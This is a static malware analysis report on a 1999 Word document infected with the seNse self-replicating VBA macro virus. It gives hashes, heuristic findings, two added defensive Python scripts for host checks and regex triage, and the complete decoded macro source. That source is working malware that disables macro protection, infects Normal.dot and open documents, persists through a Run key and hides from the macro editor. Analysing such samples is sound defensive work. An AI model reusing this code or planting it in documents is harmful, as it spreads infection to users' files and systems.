Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a1652103119dc1ad…

MALICIOUS

Office (OLE)

Size: 34.5 KB | Created: 1999-07-16 13:41:00 | Authoring application: Microsoft Word 8.0 | First seen: 2012-06-14
MD5: e6fa3fb598313b40637c5dc132f77be7
SHA-1: 3d47fb38aa3e465d04f4e4f0dc76c1d9673d6f42
SHA-256: a1652103119dc1ad155a34393e869fa660f3db7e45e88597d7db8ead754eddec
Risk score: 396

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The extracted VBA is a W97M-style self-replicating macro virus that calls itself seNse (author string 'f0re [UC/Skamerwerks/DVC]', version '.C (1.1)'), not a downloader or backdoor: nothing in the source fetches remote content, so an Ingress Tool Transfer (T1105) mapping is not supported by this sample. AutoExec calls Stealth(), which saves Normal.dot as a template to %windir%\System\id.sys, copies that to c:\windll.dat and launches a hidden batch file (%windir%\System\seNse.bat, padded with 500 'rem' lines) that loops until it can move c:\windll.dat over the path of Normal.dot. AutoClose sets Options.VirusProtection, ConfirmConversions and SaveNormalPrompt to False and then infects in both directions: if the 'seNse' module is absent from the global template it is exported from the active document to %windir%\tempad.dll and imported into Normal.dot, which is saved; if it is absent from the active document it is exported from Normal.dot to %windir%\tempnt.dll, imported, and the document is re-saved. The '.dll' files are VBComponent.Export output (VBA source text), not PE DLLs. For persistence the module is exported again to %windir%\seNse.dll, the HKCU\Software\Microsoft\Windows\CurrentVersion\Run value 'seNse' is set to %windir%\seNse.vbs through System.PrivateProfileString, and that VBScript is written: at each logon it creates Word.Application via CreateObject, removes the seNse module from Normal.dot and re-imports it from seNse.dll, saves and quits, so cleaning Normal.dot alone does not remove the infection. ToolsMacro and ViewVBCode override the Word commands of the same name: they delete the module's code from Normal.dot and every open document before the dialog or editor is shown, and ToolsMacro restores it afterwards if the VB editor was not opened. The Shell() and CreateObject() calls flagged below are the batch launcher and the VBS re-infector respectively; neither stages an external payload.
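Host-side check for the persistence chain described above, as an added example (not code from this report or from any vendor tool). The artifact paths are the ones the extracted macro writes, resolved against %windir% the way the macro's Environ("windir") call does; assess() is a pure function over a set of observations so it can be run against collected data offline, and collect_windows() is the only part that reads the live registry (winreg) and file system. The remediation order it prints is this example's own recommendation: the Run value and seNse.vbs/seNse.dll go first because the VBS re-imports the module into Normal.dot at every logon, and Normal.dot itself is cleaned or replaced last, otherwise the next Word session re-drops everything.

```python
"""Host IOC check for the seNse persistence chain.

Added example, not from the report or any vendor tool. Artifact names come from
the extracted macro; assess() is pure and testable offline, collect_windows()
touches the live host (Windows only). The cleanup order is this example's
recommendation, not something the report states.
"""
import ntpath
import os
import sys

RUN_KEY_PATH = r"Software\Microsoft\Windows\CurrentVersion\Run"
RUN_VALUE_NAME = "seNse"


def expected_artifacts(windir: str, system_drive: str = "C:") -> dict:
    """Files the macro creates, relative to %windir% (ntpath so the layout is identical off-Windows)."""
    return {
        "run_target": ntpath.join(windir, "seNse.vbs"),        # launched from HKCU Run at logon
        "module_export": ntpath.join(windir, "seNse.dll"),     # VBComponent.Export text, not a PE DLL
        "temp_ad": ntpath.join(windir, "tempad.dll"),          # transient export, document -> Normal.dot
        "temp_nt": ntpath.join(windir, "tempnt.dll"),          # transient export, Normal.dot -> document
        "batch": ntpath.join(windir, "System", "seNse.bat"),   # hidden move loop started by Shell()
        "template_copy": ntpath.join(windir, "System", "id.sys"),
        "staged_normal": system_drive + r"\windll.dat",        # copy the batch moves over Normal.dot
    }


def assess(run_values: dict, present_paths: set, windir: str) -> dict:
    """run_values: HKCU Run value name -> data. present_paths: candidate paths that exist."""
    expected = expected_artifacts(windir)
    lower_present = {p.lower() for p in present_paths}
    found = {name: path for name, path in expected.items() if path.lower() in lower_present}

    run_target = run_values.get(RUN_VALUE_NAME)
    # The macro stores <windir>\seNse.vbs; compare the file name so a relocated %windir% still counts.
    persisted = run_target is not None and ntpath.basename(run_target).lower() == "sense.vbs"
    infected = persisted or any(
        k in found for k in ("run_target", "module_export", "batch", "staged_normal", "template_copy"))

    plan = []
    if persisted:
        plan.append(f"delete HKCU\\{RUN_KEY_PATH} value '{RUN_VALUE_NAME}' (stops the logon re-infector)")
    for key in ("run_target", "module_export"):
        if key in found:
            plan.append(f"delete {found[key]} (VBS re-import source)")
    if "batch" in found or "staged_normal" in found:
        plan.append("terminate any cmd.exe running seNse.bat, then delete the batch and c:\\windll.dat")
    for key in ("temp_ad", "temp_nt", "template_copy"):
        if key in found:
            plan.append(f"delete {found[key]}")
    if infected:
        plan.append("remove the 'seNse' module from Normal.dot (or restore a known-good Normal.dot) "
                    "and re-scan every document saved from this profile")
    return {"infected": infected, "run_persistence": run_target if persisted else None,
            "present": sorted(found.values()), "plan": plan}


def collect_windows() -> tuple:
    """Enumerate HKCU Run values and probe for the artifact paths. Windows only."""
    import winreg  # only importable on Windows

    run_values = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY_PATH) as key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:  # raised once the last value has been read
                break
            run_values[name] = str(data)
            index += 1
    windir = os.environ.get("windir", r"C:\Windows")
    present = {p for p in expected_artifacts(windir).values() if os.path.exists(p)}
    return run_values, present, windir


if __name__ == "__main__" and sys.platform == "win32":
    result = assess(*collect_windows())
    print("infected" if result["infected"] else "clean")
    for step in result["plan"]:
        print(" -", step)
```

On a suspect host run the script as the affected user (the Run value lives under HKCU); on a collection box feed assess() the exported Run values and the file listing instead.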

Heuristics 9

  • ClamAV: Doc.Trojan.Verlor-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Verlor-1
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    NTReturn = Shell(windir & "\System\seNse.bat", 0)
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False: Options.ConfirmConversions = False: Options.SaveNormalPrompt = False
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    windir = Environ("windir")
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
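The pairing rule and the self-replication rule described in the findings above, implemented as an added example in Python (not the analysis engine's or oletools' code, and not the sample's). It runs over lines quoted from the extracted seNse module and over a benign Document_Open stub. Network tokens are tracked separately from local execution tokens so that a downloader verdict requires actual download or HTTP APIs; for this sample that list comes back empty. The regexes, the AutoExec entry point and the command-hook list (ToolsMacro and ViewVBCode as used by seNse, plus the Word command names FileSaveAs, ToolsOptions and FileTemplates) are this example's own choices.

```python
"""Static triage of decoded VBA source for macro-virus behaviour.

Added example: not code from the report, from oletools, or from the sample's
author. It re-implements the report's pairing rule and self-replication rule
as plain regexes and runs them over lines quoted from the extracted seNse
macro. Point it at any decoded macros.bas (for example the output of olevba).
"""
import re
import sys

# Auto-execution entry points named by the report's pairing rule, plus AutoExec (used by seNse).
AUTOEXEC = re.compile(
    r"^\s*(?:Private\s+|Public\s+)?Sub\s+"
    r"(Auto_?Open|Auto_?Close|Auto_?Exec|Document_Open|Document_Close|Workbook_Open)\b",
    re.IGNORECASE | re.MULTILINE)
# Local execution / object-creation tokens.
EXEC_TOKENS = re.compile(
    r"\b(Shell|ShellExecute|CreateObject|GetObject|ExecuteExcel4Macro|PowerShell|cmd\.exe)\b", re.IGNORECASE)
# Network / download tokens, kept separate: a "downloader" verdict needs one of these.
NET_TOKENS = re.compile(
    r"\b(URLDownloadToFile|WinHttp|XMLHTTP|MSXML2|ADODB\.Stream|InternetOpen)\b", re.IGNORECASE)
# Self-replication through the VBE object model and macro-protection tampering.
REPLICATION = {
    "vbe_export_import": re.compile(
        r"\.VBComponents(?:\.Item)?\s*\([^)]*\)\.Export\b|\.VBComponents\.Import\b", re.IGNORECASE),
    "vbe_code_rewrite": re.compile(
        r"\.CodeModule\.(?:InsertLines|DeleteLines|AddFromString)\b|\.OrganizerCopy\b", re.IGNORECASE),
    "normal_template_write": re.compile(r"\bNormalTemplate\.(?:Save|VBProject)\b", re.IGNORECASE),
    "virus_protection_off": re.compile(r"Options\.VirusProtection\s*=\s*False", re.IGNORECASE),
}
# Word built-in command names a macro can override to hide itself (seNse hooks the first two).
COMMAND_HOOKS = re.compile(
    r"^\s*(?:Private\s+|Public\s+)?Sub\s+(ToolsMacro|ViewVBCode|FileSaveAs|ToolsOptions|FileTemplates)\b",
    re.IGNORECASE | re.MULTILINE)
# System.PrivateProfileString("", "HKEY_...\CurrentVersion\Run", "<value name>") = <data>
RUN_KEY_WRITE = re.compile(
    r'PrivateProfileString\s*\(\s*""\s*,\s*"(HKEY_[^"]*\\CurrentVersion\\Run)"\s*,\s*"([^"]*)"\s*\)\s*=\s*(.+)$',
    re.IGNORECASE | re.MULTILINE)

# Constructed sample: lines quoted from the report's extracted macro listing.
SAMPLE = r'''Sub AutoExec()
 Call Stealth
End Sub
Sub AutoClose()
Options.VirusProtection = False: Options.ConfirmConversions = False: Options.SaveNormalPrompt = False
ActiveDocument.VBProject.VBComponents("seNse").Export (windir & "\tempad.dll")
NormalTemplate.VBProject.VBComponents.import (windir & "\tempad.dll")
NormalTemplate.Save
NormalTemplate.VBProject.VBComponents("seNse").Export (windir & "\seNse.dll")
System.PrivateProfileString("", "HKEY_CURRENT_USER\software\microsoft\windows\CurrentVersion\run", "seNse") = windir & "\seNse.vbs"
Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
End Sub
Sub Stealth()
NTReturn = Shell(windir & "\System\seNse.bat", 0)
End Sub
Sub ToolsMacro()
NormalTemplate.VBProject.VBComponents("seNse").CodeModule.deletelines 1, 10
End Sub
'''


def triage(vba_source: str) -> dict:
    """Indicator breakdown (1-based line numbers) and a verdict for one decoded module."""
    lines = vba_source.splitlines()
    names = lambda rx: sorted({m.group(1) for m in rx.finditer(vba_source)}, key=str.lower)
    replication = {k: [n for n, line in enumerate(lines, 1) if rx.search(line)]
                   for k, rx in REPLICATION.items()}
    auto_exec, exec_tokens, net_tokens = names(AUTOEXEC), names(EXEC_TOKENS), names(NET_TOKENS)
    # Self-replication = copying/rewriting module code AND touching Normal.dot or macro protection.
    replicates = bool(replication["vbe_export_import"] or replication["vbe_code_rewrite"]) and \
        bool(replication["normal_template_write"] or replication["virus_protection_off"])
    if replicates:
        verdict = "macro-virus: self-replicating"
    elif auto_exec and (exec_tokens or net_tokens):  # the report's p-code pairing rule
        verdict = "suspicious: auto-exec paired with execution token"
    else:
        verdict = "no macro-virus indicators"
    return {
        "verdict": verdict, "auto_exec": auto_exec, "exec_tokens": exec_tokens,
        "net_tokens": net_tokens, "replication": replication, "command_hooks": names(COMMAND_HOOKS),
        "run_key_writes": [{"key": m.group(1), "value": m.group(2), "data": m.group(3).strip()}
                           for m in RUN_KEY_WRITE.finditer(vba_source)],
    }


if __name__ == "__main__":
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE
    result = triage(text)
    print(result["verdict"], "| network tokens:", result["net_tokens"] or "none")
    for name, where in result["replication"].items():
        print(f"  {name}: lines {where}")
```

Pass the path of a decoded macros.bas as the first argument to triage a different document; with no argument it runs over the quoted seNse lines. The line numbers it reports are the ones to quote in a finding, since they point at the exact Export/Import and CodeModule calls rather than at the module as a whole.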

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5477 bytes
SHA-256: ee74fcaf531b493446464f90ba3f42b3a96e196ce949e2422190e94764fef076
Detection
ClamAV: Doc.Trojan.Verlor-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "seNse"
Sub AutoExec()
 Call Stealth
End Sub
Sub AutoClose()
On Error Resume Next

'MyName = seNse
'WrittenBy = f0re [UC/Skamerwerks/DVC]
'SpecialTanksTo = Flitnic
'Version = .C (1.1)

Options.VirusProtection = False: Options.ConfirmConversions = False: Options.SaveNormalPrompt = False
windir = Environ("windir")

If Dir(NormalTemplate.FullName) = "" Then GoTo EndSub
SetAttr NormalTemplate.FullName, vbNormal

If NormalTemplate.VBProject.VBComponents.Item("seNse").CodeModule.Lines(7, 1) <> "'MyName = seNse" Then
ActiveDocument.VBProject.VBComponents("seNse").Export (windir & "\tempad.dll")
NormalTemplate.VBProject.VBComponents.import (windir & "\tempad.dll")
NormalTemplate.Save
End If
If ActiveDocument.VBProject.VBComponents.Item("seNse").CodeModule.Lines(7, 1) <> "'MyName = seNse" Then
NormalTemplate.VBProject.VBComponents("seNse").Export (windir & "\tempnt.dll")
ActiveDocument.VBProject.VBComponents.import (windir & "\tempnt.dll")
ActiveDocument.SaveAs ActiveDocument.FullName
End If

If Dir(windir & "\seNse.vbs") <> "" Then Kill (windir & "\seNse.vbs")
If Dir(windir & "\seNse.dll") <> "" Then Kill (windir & "\seNse.dll")

NormalTemplate.VBProject.VBComponents("seNse").Export (windir & "\seNse.dll")
System.PrivateProfileString("", "HKEY_CURRENT_USER\software\microsoft\windows\CurrentVersion\run", "seNse") = windir & "\seNse.vbs"

Open windir & "\seNse.vbs" For Append As #1
Print #1, "On error resume next"
Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Print #1, "WordObj.Options.SaveNormalPrompt = False"
Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.remove WordObj.NormalTemplate.VBProject.VBComponents(" & Chr(34) & "seNse" & Chr(34) & ")"
Print #1, "WordObj.NormalTemplate.save"
Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.import (" & Chr(34) & windir & "\seNse.dll" & Chr(34) & ")"
Print #1, "WordObj.NormalTemplate.save"
Print #1, "set NT = nothing"
Print #1, "WordObj.Quit"
Close #1

EndSub:
End Sub
Sub Stealth()

windir = Environ("windir")
If Dir(windir & "\System\id.sys") <> "" Then Kill windir & "\System\id.sys"
If Dir(windir & "\System\seNse.bat") <> "" Then Kill windir & "\System\seNse.bat"

NormalTemplate.OpenAsDocument
NTAtt = ActiveDocument.ReadOnly
ActiveDocument.SaveAs FileName:=windir & "\System\id.sys", FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
NormalTemplate.Saved = True
ActiveDocument.Saved = True
ActiveDocument.Close

Close #1
Open windir & "\System\seNse.bat" For Append As #1
Print #1, ":Begin"
For i = 1 To 500
Print #1, "rem seNse was coded by f0re [UC/Skamwerks/DVC]"
Next i
Print #1, ":Begin"
Print #1, "Move /y " & Chr(34) & "c:\windll.dat" & Chr(34) & " " & Chr(34) & NormalTemplate.FullName & Chr(34)
Print #1, "If exist c:\windll.dat goto Begin"
Close #1

FileCopy windir & "\System\id.sys", "c:\windll.dat"
NTReturn = Shell(windir & "\System\seNse.bat", 0)
End Sub
Sub ViewVBCode()
On Error Resume Next

NormalTemplate.VBProject.VBComponents("seNse").CodeModule.deletelines 1, NormalTemplate.VBProject.VBComponents("seNse").CodeModule.CountOfLines
NormalTemplate.Saved = True
NormalTemplate.VBProject.VBComponents.Remove NormalTemplate.VBProject.VBComponents("seNse")
NormalTemplate.Saved = True
docnumber = Application.Documents.Count
If docnumber >= 1 Then
 For X = 1 To docnumber
  Documents(X).VBProject.VBComponents("seNse").CodeModule.deletelines 1, Documents(X).VBProject.VBComponents("seNse").CodeModule.CountOfLines
  Documents(X).Saved = True
  Documents(X).VBProject.VBComponents.Remove Documents(X).VBProject.VBComponents("seNse")
  Documents(X).Saved = True
 Next X
End If

Application.ShowVisualBasicEditor = True
End Sub
Sub ToolsMacro()
On Error Resume Next

For X = 1 To NormalTemplate.VBProject.VBComponents("seNse").CodeModule.CountOfLines
 CodeNT = CodeNT & NormalTemplate.VBProject.VBComponents("seNse").CodeModule.Lines(X, 1) & Chr(13)
Next X
NormalTemplate.VBProject.VBComponents("seNse").CodeModule.deletelines 1, NormalTemplate.VBProject.VBComponents("seNse").CodeModule.CountOfLines
NormalTemplate.Saved = True
docnumber = Application.Documents.Count
If docnumber >= 1 Then
 For X = 1 To ActiveDocument.VBProject.VBComponents("seNse").CodeModule.CountOfLines
  CodeAD = CodeAD & ActiveDocument.VBProject.VBComponents("seNse").CodeModule.Lines(X, 1) & Chr(13)
 Next X
 For X = 1 To docnumber
  Documents(X).VBProject.VBComponents("seNse").CodeModule.deletelines 1, Documents(X).VBProject.VBComponents("seNse").CodeModule.CountOfLines
  Documents(X).Saved = True
 Next X
End If

Application.Dialogs(wdDialogToolsMacro).Show

If Application.ShowVisualBasicEditor = False Then
 NormalTemplate.VBProject.VBComponents("seNse").CodeModule.InsertLines 1, CodeNT
 NormalTemplate.Save
 If docnumber >= 1 Then
  For X = 1 To docnumber
   Documents(X).VBProject.VBComponents("seNse").CodeModule.InsertLines 1, CodeAD
   Documents(X).SaveAs Documents(X).FullName
  Next X
 End If
End If
End Sub

'Put this code in a module called "seNse". Experience stealth :) (but again not perfect stealth).